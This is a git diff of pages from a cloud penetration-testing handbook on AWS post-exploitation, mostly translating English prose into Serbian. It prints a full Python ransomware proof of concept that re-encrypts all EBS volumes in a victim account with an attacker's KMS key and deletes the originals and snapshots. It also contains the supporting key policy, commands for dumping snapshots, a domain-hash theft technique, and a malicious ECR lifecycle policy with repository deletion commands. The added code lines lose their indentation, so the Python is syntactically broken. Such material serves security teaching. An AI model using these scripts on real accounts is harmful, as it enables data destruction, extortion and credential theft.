+"kms:Create*",
+"kms:Describe*",
+"kms:Enable*",
+"kms:List*",
+"kms:Put*",
+"kms:Update*",
+"kms:Revoke*",
+"kms:Disable*",
+"kms:Get*",
+"kms:Delete*",
+"kms:TagResource",
+"kms:UntagResource",
+"kms:ScheduleKeyDeletion",
+"kms:CancelKeyDeletion"
+],
+"Resource": "*"
+},
+{
+"Sid": "Allow use of the key",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
+"kms:Encrypt",
+"kms:Decrypt",
+"kms:ReEncrypt*",
+"kms:GenerateDataKey*",
+"kms:DescribeKey"
+],
+"Resource": "*"
+},
+{
+"Sid": "Allow attachment of persistent resources",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
+"Resource": "*",
+"Condition": {
+"Bool": {
+"kms:GrantIsForAWSResource": "true"
+}
+}
+}
+]
 }
 ```
-
-Wait a moment for the newly set key policy to propagate. Then return to the 'victim' account and attempt to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume.
+Sačekajte trenutak da se nova politika ključeva propagira. Zatim se vratite na 'žrtvovani' nalog i pokušajte da priključite jedan od novokodiranih EBS volumena. Otkrivaćete da možete da priključite volumen.
 
 ![Pasted image 20231231174131](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/ba9e5340-7020-4af9-95cc-0e02267ced47) ![Pasted image 20231231174258](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/6c3215ec-4161-44e2-b1c1-e32f43ad0fa4)
 
-But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it.
+Ali kada pokušate da zapravo pokrenete EC2 instancu sa kodiranim EBS volumenom, jednostavno će propasti i preći iz 'pending' stanja nazad u 'stopped' stanje zauvek, pošto se priključen EBS volumen ne može dekriptovati koristeći ključ, jer politika ključeva više to ne dozvoljava.
 
 ![Pasted image 20231231174322](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/73456c22-0828-4da9-a737-e4d90fa3f514) ![Pasted image 20231231174352](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4d83a90e-6fa9-4003-b904-a4ba7f5944d0)
 
-This the python script used. It takes AWS creds for a 'victim' account and a publicly available AWS ARN value for the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots utilized during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the utilized KMS key and restore them to their original state via snapshots, but just want to make you aware that this is a ransomware PoC at the end of the day.
-
+Ovo je python skripta koja se koristi. Uzima AWS kredencijale za 'žrtvovani' nalog i javno dostupnu AWS ARN vrednost za ključ koji će se koristiti za enkripciju. Skripta će napraviti enkriptovane kopije SVIH dostupnih EBS volumena priključenih na SVE EC2 instance u ciljanom AWS nalogu, zatim će zaustaviti svaku EC2 instancu, odvojiti originalne EBS volumene, obrisati ih i konačno obrisati sve snimke korišćene tokom procesa. Ovo će ostaviti samo enkriptovane EBS volumene u ciljanom 'žrtvovanom' nalogu. SAMO KORISTITE OVU SKRIPTU U TESTNOM OKRUŽENJU, ONA JE DESTRUKTIVNA I OBRISAĆE SVE ORIGINALNE EBS VOLUMENE. Možete ih povratiti koristeći korišćeni KMS ključ i vratiti ih u prvobitno stanje putem snimaka, ali želim da vas obavestim da je ovo PoC za ransomware na kraju dana.
 ```
 import boto3
 import argparse
 from botocore.exceptions import ClientError
 
 def enumerate_ec2_instances(ec2_client):
-    instances = ec2_client.describe_instances()
-    instance_volumes = {}
-    for reservation in instances['Reservations']:
-        for instance in reservation['Instances']:
-            instance_id = instance['InstanceId']
-            volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
-            instance_volumes[instance_id] = volumes
-    return instance_volumes
+instances = ec2_client.describe_instances()
+instance_volumes = {}
+for reservation in instances['Reservations']:
+for instance in reservation['Instances']:
+instance_id = instance['InstanceId']
+volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
+instance_volumes[instance_id] = volumes
+return instance_volumes
 
 def snapshot_volumes(ec2_client, volumes):
-    snapshot_ids = []
-    for volume_id in volumes:
-        snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
-        snapshot_ids.append(snapshot['SnapshotId'])
-    return snapshot_ids
+snapshot_ids = []
+for volume_id in volumes:
+snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
+snapshot_ids.append(snapshot['SnapshotId'])
+return snapshot_ids
 
 def wait_for_snapshots(ec2_client, snapshot_ids):
-    for snapshot_id in snapshot_ids:
-        ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])
+for snapshot_id in snapshot_ids:
+ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])
 
 def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
-    new_volume_ids = []
-    for snapshot_id in snapshot_ids:
-        snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
-        volume_id = snapshot_info['VolumeId']
-        volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
-        availability_zone = volume_info['AvailabilityZone']
+new_volume_ids = []
+for snapshot_id in snapshot_ids:
+snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
+volume_id = snapshot_info['VolumeId']
+volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
+availability_zone = volume_info['AvailabilityZone']
 
-        volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
-                                          Encrypted=True, KmsKeyId=kms_key_arn)
-        new_volume_ids.append(volume['VolumeId'])
-    return new_volume_ids
+volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
+Encrypted=True, KmsKeyId=kms_key_arn)
+new_volume_ids.append(volume['VolumeId'])
+return new_volume_ids
 
 def stop_instances(ec2_client, instance_ids):
-    for instance_id in instance_ids:
-        try:
-            instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
-            instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
+for instance_id in instance_ids:
+try:
+instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
+instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
 
-            if instance_state == 'running':
-                ec2_client.stop_instances(InstanceIds=[instance_id])
-                print(f"Stopping instance: {instance_id}")
-                ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
-                print(f"Instance {instance_id} stopped.")
-            else:
-                print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
+if instance_state == 'running':
+ec2_client.stop_instances(InstanceIds=[instance_id])
+print(f"Stopping instance: {instance_id}")
+ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
+print(f"Instance {instance_id} stopped.")
+else:
+print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
 
-        except ClientError as e:
-            print(f"Error stopping instance {instance_id}: {e}")
+except ClientError as e:
+print(f"Error stopping instance {instance_id}: {e}")
 
 def detach_and_delete_volumes(ec2_client, volumes):
-    for volume_id in volumes:
-        try:
-            ec2_client.detach_volume(VolumeId=volume_id)
-            ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
-            ec2_client.delete_volume(VolumeId=volume_id)
-            print(f"Deleted volume: {volume_id}")
-        except ClientError as e:
-            print(f"Error detaching or deleting volume {volume_id}: {e}")
+for volume_id in volumes:
+try:
+ec2_client.detach_volume(VolumeId=volume_id)
+ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
+ec2_client.delete_volume(VolumeId=volume_id)
+print(f"Deleted volume: {volume_id}")
+except ClientError as e:
+print(f"Error detaching or deleting volume {volume_id}: {e}")
 
 
 def delete_snapshots(ec2_client, snapshot_ids):
-    for snapshot_id in snapshot_ids:
-        try:
-            ec2_client.delete_snapshot(SnapshotId=snapshot_id)
-            print(f"Deleted snapshot: {snapshot_id}")
-        except ClientError as e:
-            print(f"Error deleting snapshot {snapshot_id}: {e}")
+for snapshot_id in snapshot_ids:
+try:
+ec2_client.delete_snapshot(SnapshotId=snapshot_id)
+print(f"Deleted snapshot: {snapshot_id}")
+except ClientError as e:
+print(f"Error deleting snapshot {snapshot_id}: {e}")
 
 def replace_volumes(ec2_client, instance_volumes):
-    instance_ids = list(instance_volumes.keys())
-    stop_instances(ec2_client, instance_ids)
+instance_ids = list(instance_volumes.keys())
+stop_instances(ec2_client, instance_ids)
 
-    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
-    detach_and_delete_volumes(ec2_client, all_volumes)
+all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
+detach_and_delete_volumes(ec2_client, all_volumes)
 
 def ebs_lock(access_key, secret_key, region, kms_key_arn):
-    ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
+ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
 
-    instance_volumes = enumerate_ec2_instances(ec2_client)
-    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
-    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
-    wait_for_snapshots(ec2_client, snapshot_ids)
-    create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
-    replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
-    delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed
+instance_volumes = enumerate_ec2_instances(ec2_client)
+all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
+snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
+wait_for_snapshots(ec2_client, snapshot_ids)
+create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
+replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
+delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed
 
 def parse_arguments():
-    parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
-    parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
-    parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
-    parser.add_argument('--region', required=True, help='AWS Region')
-    parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
-    return parser.parse_args()
+parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
+parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
+parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
+parser.add_argument('--region', required=True, help='AWS Region')
+parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
+return parser.parse_args()
 
 def main():
-    args = parse_arguments()
-    ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
+args = parse_arguments()
+ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
 
-    instance_volumes = enumerate_ec2_instances(ec2_client)
-    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
-    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
-    wait_for_snapshots(ec2_client, snapshot_ids)
-    create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
-    replace_volumes(ec2_client, instance_volumes)
-    delete_snapshots(ec2_client, snapshot_ids)
+instance_volumes = enumerate_ec2_instances(ec2_client)
+all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
+snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
+wait_for_snapshots(ec2_client, snapshot_ids)
+create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
+replace_volumes(ec2_client, instance_volumes)
+delete_snapshots(ec2_client, snapshot_ids)
 
 if __name__ == "__main__":
-    main()
+main()
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
index 7a9a19cc4..1e7b964af 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
@@ -2,8 +2,7 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Checking a snapshot locally
-
+## Provera snimka lokalno
 ```bash
 # Install dependencies
 pip install 'dsnap[cli]'
@@ -32,10 +31,8 @@ cd dsnap
 make docker/build
 IMAGE=".img" make docker/run #With the snapshot downloaded
 ```
-
 > [!CAUTION]
-> **Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that:
-
+> **Napomena** da `dsnap` neće omogućiti preuzimanje javnih snimaka. Da biste to zaobišli, možete napraviti kopiju snimka u svom ličnom nalogu i preuzeti to:
 ```bash
 # Copy the snapshot
 aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"
@@ -49,59 +46,55 @@ dsnap --region us-east-2 get snap-027da41be451109da
 # Delete the snapshot after downloading
 aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2
 ```
+Za više informacija o ovoj tehnici proverite originalno istraživanje na [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
 
-For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
-
-You can do this with Pacu using the module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots)
-
-## Checking a snapshot in AWS
+Možete to uraditi sa Pacu koristeći modul [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots)
 
+## Proveravanje snimka u AWS-u
 ```bash
 aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89
 ```
+**Montirajte ga u EC2 VM pod vašom kontrolom** (mora biti u istoj regiji kao kopija rezervne kopije):
 
-**Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup):
+Step 1: Nova zapremina vaše željene veličine i tipa treba da se kreira odlaskom na EC2 –> Zapremine.
 
-Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 –> Volumes.
+Da biste mogli da izvršite ovu radnju, pratite ove komande:
 
-To be able to perform this action, follow these commands:
+- Kreirajte EBS zapreminu koju ćete priključiti EC2 instanci.
+- Osigurajte da su EBS zapremina i instanca u istoj zoni.
 
-- Create an EBS volume to attach to the EC2 instance.
-- Ensure that the EBS volume and the instance are in the same zone.
+Step 2: Opcija "priključi zapreminu" treba da se izabere desnim klikom na kreiranu zapreminu.
 
-Step 2: The "attach volume" option is to be selected by right-clicking on the created volume.
+Step 3: Instanca iz tekstualnog okvira instance treba da se izabere.
 
-Step 3: The instance from the instance text box is to be selected.
+Da biste mogli da izvršite ovu radnju, koristite sledeću komandu:
 
-To be able to perform this action, use the following command:
+- Priključite EBS zapreminu.
 
-- Attach the EBS volume.
+Step 4: Prijavite se na EC2 instancu i nabrojite dostupne diskove koristeći komandu `lsblk`.
 
-Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`.
+Step 5: Proverite da li zapremina ima podataka koristeći komandu `sudo file -s /dev/xvdf`.
 
-Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`.
+Ako izlaz gornje komande prikazuje "/dev/xvdf: data", to znači da je zapremina prazna.
 
-If the output of the above command shows "/dev/xvdf: data", it means the volume is empty.
+Step 6: Formatirajte zapreminu u ext4 datotečni sistem koristeći komandu `sudo mkfs -t ext4 /dev/xvdf`. Alternativno, možete koristiti i xfs format koristeći komandu `sudo mkfs -t xfs /dev/xvdf`. Imajte na umu da treba da koristite ili ext4 ili xfs.
 
-Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs.
+Step 7: Kreirajte direktorijum po vašem izboru da montirate novu ext4 zapreminu. Na primer, možete koristiti naziv "newvolume".
 
-Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume".
+Da biste mogli da izvršite ovu radnju, koristite komandu `sudo mkdir /newvolume`.
 
-To be able to perform this action, use the command `sudo mkdir /newvolume`.
+Step 8: Montirajte zapreminu u direktorijum "newvolume" koristeći komandu `sudo mount /dev/xvdf /newvolume/`.
 
-Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`.
+Step 9: Promenite direktorijum u "newvolume" direktorijum i proverite prostor na disku da biste potvrdili montiranje zapremine.
 
-Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount.
+Da biste mogli da izvršite ovu radnju, koristite sledeće komande:
 
-To be able to perform this action, use the following commands:
+- Promenite direktorijum u `/newvolume`.
+- Proverite prostor na disku koristeći komandu `df -h .`. Izlaz ove komande treba da prikazuje slobodan prostor u "newvolume" direktorijumu.
 
-- Change directory to `/newvolume`.
-- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory.
-
-You can do this with Pacu using the module `ebs__explore_snapshots`.
-
-## Checking a snapshot in AWS (using cli)
+Možete to uraditi sa Pacu koristeći modul `ebs__explore_snapshots`.
 
+## Proveravanje snimka u AWS (koristeći cli)
 ```bash
 aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id 
 
@@ -127,19 +120,14 @@ sudo mount /dev/xvdh1 /mnt
 
 ls /mnt
 ```
-
 ## Shadow Copy
 
-Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
+Svaki AWS korisnik koji ima **`EC2:CreateSnapshot`** dozvolu može ukrasti hešove svih korisnika domena kreiranjem **snapshot-a Kontrolera domena**, montirajući ga na instancu koju kontroliše i **izvozeći NTDS.dit i SYSTEM** registry hive datoteku za korišćenje sa Impacketovim secretsdump projektom.
 
-You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+Možete koristiti ovaj alat za automatizaciju napada: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) ili možete koristiti neku od prethodnih tehnika nakon kreiranja snapshot-a.
 
 ## References
 
 - [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
index eb3b5f33f..f2a8ae4b2 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
@@ -4,16 +4,12 @@
 
 **Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!**
 
-Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**.
+Pasivna inspekcija mreže u cloud okruženju je bila **izazovna**, zahtevajući velike promene u konfiguraciji za praćenje mrežnog saobraćaja. Međutim, nova funkcija pod nazivom “**VPC Traffic Mirroring**” je uvedena od strane AWS-a kako bi se pojednostavio ovaj proces. Sa VPC Traffic Mirroring, mrežni saobraćaj unutar VPC-a može biti **dupliran** bez instaliranja bilo kakvog softvera na samim instancama. Ovaj duplirani saobraćaj može biti poslat na sistem za detekciju mrežnih upada (IDS) radi **analize**.
 
-To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts.
+Da bismo odgovorili na potrebu za **automatskom implementacijom** potrebne infrastrukture za mirroring i eksfiltraciju VPC saobraćaja, razvili smo skriptu za dokazivanje koncepta pod nazivom “**malmirror**”. Ova skripta se može koristiti sa **kompromitovanim AWS kredencijalima** za postavljanje mirroring-a za sve podržane EC2 instance u ciljanom VPC-u. Važno je napomenuti da VPC Traffic Mirroring podržavaju samo EC2 instance pokretane AWS Nitro sistemom, a VPC cilj za mirroring mora biti unutar istog VPC-a kao i hostovi koji se mirroring-uju.
 
-The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible.
+**Uticaj** zlonamernog VPC saobraćaja može biti značajan, jer omogućava napadačima pristup **osetljivim informacijama** koje se prenose unutar VPC-a. **Verovatnoća** takvog zlonamernog mirroring-a je visoka, s obzirom na prisustvo **saobraćaja u čistom tekstu** koji prolazi kroz VPC-e. Mnoge kompanije koriste protokole u čistom tekstu unutar svojih internih mreža iz **razloga performansi**, pretpostavljajući da tradicionalni napadi tipa man-in-the-middle nisu mogući.
 
-For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes.
+Za više informacija i pristup [**malmirror skripti**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), može se pronaći u našoj **GitHub repozitoriji**. Skripta automatizuje i pojednostavljuje proces, čineći ga **brzim, jednostavnim i ponovljivim** za ofanzivne istraživačke svrhe.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
index a971ea769..af818bde0 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
@@ -4,14 +4,13 @@
 
 ## ECR
 
-For more information check
+Za više informacija proverite
 
 {{#ref}}
 ../aws-services/aws-ecr-enum.md
 {{#endref}}
 
-### Login, Pull & Push
-
+### Prijava, Preuzimanje & Postavljanje
 ```bash
 # Docker login into ecr
 ## For public repo (always use us-east-1)
@@ -38,17 +37,16 @@ docker push .dkr.ecr..amazonaws.com/purplepanda:latest
 # Downloading without Docker
 # List digests
 aws ecr batch-get-image --repository-name level2 \
-    --registry-id 653711331788 \
-    --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
+--registry-id 653711331788 \
+--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
 
 ## Download a digest
 aws ecr get-download-url-for-layer \
-    --repository-name level2 \
-    --registry-id 653711331788 \
-    --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
+--repository-name level2 \
+--registry-id 653711331788 \
+--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
 ```
-
-After downloading the images you should **check them for sensitive info**:
+После преузимања слика требало би да **проверите да ли садрже осетљиве информације**:
 
 {{#ref}}
 https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
@@ -56,25 +54,24 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-m
 
 ### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage`
 
-An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository.
-
+Нападач са било којом од ових дозвола може **креирати или модификовати политику животног циклуса да обрише све слике у репозиторијуму** и затим **обрисати цео ECR репозиторијум**. То би резултирало губитком свих контејнерских слика које су похрањене у репозиторијуму.
 ```bash
 bashCopy code# Create a JSON file with the malicious lifecycle policy
 echo '{
-  "rules": [
-    {
-      "rulePriority": 1,
-      "description": "Delete all images",
-      "selection": {
-        "tagStatus": "any",
-        "countType": "imageCountMoreThan",
-        "countNumber": 0
-      },
-      "action": {
-        "type": "expire"
-      }
-    }
-  ]
+"rules": [
+{
+"rulePriority": 1,
+"description": "Delete all images",
+"selection": {
+"tagStatus": "any",
+"countType": "imageCountMoreThan",
+"countNumber": 0
+},
+"action": {
+"type": "expire"
+}
+}
+]
 }' > malicious_policy.json
 
 # Apply the malicious lifecycle policy to the ECR repository
@@ -92,9 +89,4 @@ aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imag
 # Delete multiple images from the ECR public repository
 aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
index 1d2fd80a5..f715303be 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## ECS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-ecs-enum.md
@@ -12,42 +12,37 @@ For more information check:
 
 ### Host IAM Roles
 
-In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\
-Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check:
+U ECS, **IAM uloga može biti dodeljena zadatku** koji se izvršava unutar kontejnera. **Ako** se zadatak izvršava unutar **EC2** instance, **EC2 instanca** će imati **drugu IAM** ulogu prikačenu na nju.\
+Što znači da ako uspete da **kompromitujete** ECS instancu, potencijalno možete **dobiti IAM ulogu povezanu sa ECR-om i sa EC2 instancom**. Za više informacija o tome kako da dobijete te kredencijale, pogledajte:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
 {{#endref}}
 
 > [!CAUTION]
-> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.
+> Imajte na umu da ako EC2 instanca primenjuje IMDSv2, [**prema dokumentaciji**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), **odgovor PUT zahteva** će imati **hop limit od 1**, što onemogućava pristup EC2 metapodacima iz kontejnera unutar EC2 instance.
 
 ### Privesc to node to steal other containers creds & secrets
 
-But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached.
+Ali pored toga, EC2 koristi docker za pokretanje ECs zadataka, tako da ako možete da pobegnete na čvor ili **pristupite docker socket-u**, možete **proveriti** koji se **drugi kontejneri** pokreću, i čak **ući u njih** i **ukrasti njihove IAM uloge**.
 
 #### Making containers run in current host
 
